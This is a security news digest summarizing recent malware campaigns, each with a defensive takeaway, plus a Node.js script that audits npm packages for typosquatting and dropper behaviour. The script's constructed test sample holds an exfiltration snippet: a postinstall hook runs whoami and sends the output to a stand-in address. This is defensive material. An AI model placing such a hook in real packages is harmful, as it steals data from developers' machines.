CloudWizard APT: the Bad Magic Story Goes on

Background:

A newly discovered modular malware framework dubbed CloudWizard has been active since 2016. Kaspersky researchers connected it to previously reported advanced persistent threat activity: Operation Groundbait and the Prikormka malware (2008-2016), Operation BugDrop (2017), PowerMagic (2020-2022) and CommonMagic (2022). Like those earlier campaigns, CloudWizard targets individuals, diplomatic organizations and research organizations in the Donetsk, Lugansk and Crimea regions as well as in central and western Ukraine. CloudWizard's two main modules encrypt and decrypt all communications and relay the encrypted data to cloud or web-based C2 servers. Additional modules take screenshots, record from the microphone, log keystrokes and more.

Takeaway:

ESET researchers earlier concluded that the actors behind Operation Groundbait most likely operate from within Ukraine; Kaspersky researchers did not say whether they agree with this attribution. Wars and military conflicts attract additional cyber activity.

CapCut Users Under Fire

Background:

Several campaigns are targeting users of the CapCut video editing software with typosquatted websites. Users in jurisdictions where this popular ByteDance product is banned (Taiwan, India and several other countries) are especially exposed, because they have to look for it outside the official stores. One campaign profiled by Cyble researchers delivers the Offx stealer. Another delivers BatLoader, which eventually leads to RedLine Stealer and an Antimalware Scan Interface (AMSI) bypass tool; that tool had not been detected by any antivirus engine at the time of discovery.

Takeaway:

Users should install software only from the vendor's official site or app store, and avoid pirated or repackaged copies offered on unofficial websites.


RATs Found Hiding in the npm Attic

Background:

Malicious packages on the public npm registry remained undetected for up to two months. The attackers typosquatted the names of popular, legitimate packages, impersonated them by reusing their code, and linked to the legitimate projects' GitHub repositories. ReversingLabs researchers determined that the campaign delivered a modified version of the open-source TurkoRat infostealer, which was used to steal user information and crypto wallets.

Takeaway:

Development organizations should take steps to avoid typing mistakes in dependency names and should scrutinize the features and behavior of the code they rely on. Pay attention to suspicious combinations of behavior: discrepancies in naming, command execution, hard-coded IP addresses, smaller-than-expected downloads, suspicious versioning, and writing data to files.
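As an added example (not code from the ReversingLabs report or from any real audit tool), the following Node.js script turns the takeaway above into a pre-install check: given the name, scripts and unpacked sources of a package, it flags names within two edits of a known-good dependency, install-time hooks, hard-coded IPv4 addresses, and the combination of running commands and writing files. The allow-list of popular packages, the two package objects and the 192.0.2.10 address are constructed sample data.

```javascript
// Added example: a small pre-install audit for npm packages, applying the
// signals listed in the takeaway. Everything below is constructed for
// illustration; POPULAR is an assumed allow-list, not a real dependency list.
const POPULAR = ["lodash", "express", "axios", "react", "chalk", "commander"];

// Levenshtein edit distance; typosquats usually sit at distance 1 or 2.
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Names that look like, but are not, a package on the allow-list.
function typosquatCandidates(name, popular = POPULAR) {
  if (popular.includes(name)) return []; // the exact name is the real package
  return popular.filter((p) => editDistance(name, p) <= 2);
}

const IPV4 = /\b(?:\d{1,3}\.){3}\d{1,3}\b/g;
const EXEC = /require\(["']child_process["']\)|\b(?:exec|execSync|execFile|spawn|spawnSync)\s*\(/;
const WRITE = /\b(?:writeFile|writeFileSync|appendFile|appendFileSync|createWriteStream)\s*\(/;

// Scan one JavaScript source file for the behaviors named in the takeaway.
function scanSource(file, src) {
  const findings = [];
  const ips = [...new Set(src.match(IPV4) || [])];
  if (ips.length) findings.push({ rule: "hardcoded-ip", file, detail: ips.join(",") });
  const runsCommands = EXEC.test(src);
  const writesFiles = WRITE.test(src);
  if (runsCommands) findings.push({ rule: "command-exec", file });
  if (writesFiles) findings.push({ rule: "file-write", file });
  // The combination is the stronger signal: a utility library that both runs
  // commands and writes files is behaving like a dropper.
  if (runsCommands && writesFiles) findings.push({ rule: "exec-and-write", file });
  return findings;
}

// pkg = { name, scripts, files: { "path": "source" } }, i.e. what you would
// read out of an unpacked tarball before adding it to package.json.
function auditPackage(pkg, popular = POPULAR) {
  const findings = [];
  for (const real of typosquatCandidates(pkg.name, popular)) {
    findings.push({ rule: "typosquat", detail: `${pkg.name} resembles ${real}` });
  }
  for (const hook of ["preinstall", "install", "postinstall"]) {
    if (pkg.scripts && pkg.scripts[hook]) {
      findings.push({ rule: "install-hook", detail: `${hook}: ${pkg.scripts[hook]}` });
    }
  }
  for (const [file, src] of Object.entries(pkg.files || {})) {
    findings.push(...scanSource(file, src));
  }
  return findings;
}

// Constructed sample: a look-alike of lodash whose install hook runs a command,
// writes the output to disk and posts it to a hard-coded address
// (192.0.2.10 is a documentation-range address, not a real C2).
const SUSPECT = {
  name: "lodahs",
  scripts: { postinstall: "node setup.js" },
  files: {
    "index.js": 'module.exports = require("lodash");',
    "setup.js": [
      'const { execSync } = require("child_process");',
      'const fs = require("fs");',
      'const out = execSync("whoami").toString();',
      'fs.writeFileSync("/tmp/.cache", out);',
      'require("http").get("http://192.0.2.10/u?d=" + encodeURIComponent(out));',
    ].join("\n"),
  },
};

// Constructed sample of an unremarkable package on the allow-list.
const BENIGN = {
  name: "express",
  scripts: { test: "mocha" },
  files: { "index.js": "module.exports = (req, res) => res.end('ok');" },
};

// One line per finding, for a CI log.
function summarize(pkg) {
  return auditPackage(pkg).map(
    (f) => f.rule + (f.file ? ` [${f.file}]` : "") + (f.detail ? `: ${f.detail}` : "")
  );
}

console.log("lodahs:", summarize(SUSPECT));
console.log("express:", summarize(BENIGN));
```

The edit-distance check only works against a list of names you actually intend to depend on, so keep that list in the repository and run the audit against the unpacked tarball (for example the output of `npm pack`) rather than against the registry metadata, which the attacker controls. The `exec(` pattern will also hit `RegExp.prototype.exec`; the combination rule, not any single pattern, is what should block a merge.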

China-Taiwan Tensions Spark Surge in Cyberattacks on Taiwan

Background:

In April 2023, rising geopolitical tensions between China and Taiwan resulted in an increase in cyberattacks against Taiwan, delivered through malicious emails and phishing URLs. Trellix researchers identified detections of PlugX and other malware. The malicious emails targeted various industries, with networking/IT, manufacturing and logistics the most affected. The phishing URLs led to generic login pages, company-specific pages and multi-brand login pages, all aimed at harvesting credentials. Three days after the phishing email volume peaked, PlugX RAT detections spiked, alongside sightings of other malware families such as Formbook, Kryptik and Zmutzy.

Takeaway:

All employees should be educated on the risks of phishing, specifically how to identify such attempts and whom to contact when one is spotted. Unsolicited emails that ask the recipient to follow a link and enter their credentials are a common indicator of a phishing attack.

The Dragon Who Sold His Camaro: Analyzing Custom Router Implant

Background:

Check Point researchers recently discovered a malicious firmware implant tailored for TP-Link routers. The implant is attributed to the China-sponsored group known as Camaro Dragon, and the activity overlaps with previously reported operations of Mustang Panda. The actors trojanized TP-Link firmware images by modifying two files and adding four files to the altered image. The implant contains several malicious components, including a custom backdoor dubbed Horse Shell, which provides a remote shell, file transfer and network tunneling; tunneling through a chain of infected routers lets the operators anonymize their communications.

Takeaway:

While the exact intrusion technique is not known, keep network devices patched with the latest vendor firmware and install firmware only from the vendor's official source.

Newly Identified RA Group Compromises Companies in U.S. and South Korea with Leaked Babuk Source Code

Background:

RA Group is a new ransomware group that has been publishing victim data since April 2023 and uses double-extortion tactics. Talos researchers established that RA Group's ransomware is based on the leaked Babuk ransomware source code. The ransomware is written in C++, appears to be customized per victim with the target's name embedded, and uses curve25519 together with the eSTREAM stream cipher HC-128 for encryption. The group's first exposed targets were organizations in the US and South Korea.

Takeaway:

Ransomware is a constantly evolving threat, and the most fundamental defense is a tested backup and restore process that allows recovery without any need to decrypt the affected data. The data-theft side of double extortion is contained through network segmentation, encrypting data at rest, and limiting the storage of personal and sensitive data.
